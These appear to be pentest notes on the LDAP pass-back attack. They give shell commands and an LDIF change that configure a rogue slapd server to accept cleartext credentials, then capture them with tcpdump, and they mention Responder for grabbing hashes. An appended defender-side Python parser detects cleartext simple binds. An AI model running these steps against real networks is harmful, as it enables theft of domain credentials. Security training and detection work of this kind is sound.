Rogue LDAP Servers

LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD.

You can also just grab the hash with Responder... Pretty easy.

https://hacklido.com/blog/282-ldap-pass-back-attack-a-old-printers-story

https://www.devilsec.io/2019/04/29/hacking-printers-for-profit/

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd # Configure the LDAP server
# For the DNS domain name and Organization name, use the target domain name.
# You can use any password.
# Select the MDB database.
# Do not remove the database when slapd is purged.
# Move old database: Yes.

# Make a file named olcSaslSecProps.ldif with the following content.
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

# Patch the LDAP server
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

# Check config. This did not work for me; it always only showed dn:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

# You should now be able to listen for the traffic to come through in plain text with Wireshark.

# Or you can use tcpdump to listen
sudo tcpdump -SX -i $interface tcp port 389

# Disable the server when you're done. 
sudo systemctl disable --now slapd
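As an added defender-side example (not part of the original notes): a small BER parser that recognizes an LDAPv3 BindRequest in a port-389 payload and flags a simple bind carrying a cleartext password, which is exactly what the pass-back traffic above looks like on the wire. The DN and password are constructed sample values, and the builder exists only so the check runs stand-alone; it reports that a password was sent, not the password itself.

```python
# Detect cleartext LDAP simple binds (the exposure a pass-back attack relies on)
# by parsing the BER-encoded BindRequest from a TCP payload seen on port 389.
SIMPLE_AUTH, SASL_AUTH = 0x80, 0xA3   # BindRequest authentication CHOICE tags

def _tlv(tag: int, body: bytes) -> bytes:
    """Encode one BER TLV (short or long definite length)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    length = first
    if first & 0x80:                       # long form: (first & 0x7F) length bytes follow
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def build_bind_request(dn: str, password: str, sasl_mech=None) -> bytes:
    """Constructed LDAPv3 BindRequest: simple auth, or SASL when a mechanism is given."""
    if sasl_mech is None:
        auth = _tlv(SIMPLE_AUTH, password.encode())
    else:                                  # SASL credentials omitted; only the mechanism
        auth = _tlv(SASL_AUTH, _tlv(0x04, sasl_mech.encode()))
    bind = _tlv(0x60, _tlv(0x02, b"\x03") + _tlv(0x04, dn.encode()) + auth)
    return _tlv(0x30, _tlv(0x02, b"\x01") + bind)   # LDAPMessage, messageID 1

def inspect_bind(payload: bytes):
    """Return {dn, auth, cleartext_password} for a BindRequest, else None."""
    tag, msg, _ = _read_tlv(payload, 0)
    if tag != 0x30:                        # not an LDAPMessage
        return None
    _, _, pos = _read_tlv(msg, 0)          # messageID
    op_tag, bind, _ = _read_tlv(msg, pos)
    if op_tag != 0x60:                     # not a BindRequest ([APPLICATION 0])
        return None
    _, _, pos = _read_tlv(bind, 0)         # protocol version
    _, dn, pos = _read_tlv(bind, pos)      # LDAPDN
    auth_tag, auth, _ = _read_tlv(bind, pos)
    return {"dn": dn.decode(), "auth": "simple" if auth_tag == SIMPLE_AUTH else "sasl",
            "cleartext_password": auth_tag == SIMPLE_AUTH and len(auth) > 0}

if __name__ == "__main__":
    # Constructed sample: a printer's lookup account binding with a simple bind.
    print(inspect_bind(build_bind_request("cn=printer,dc=corp,dc=local", "not-a-real-password")))
```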
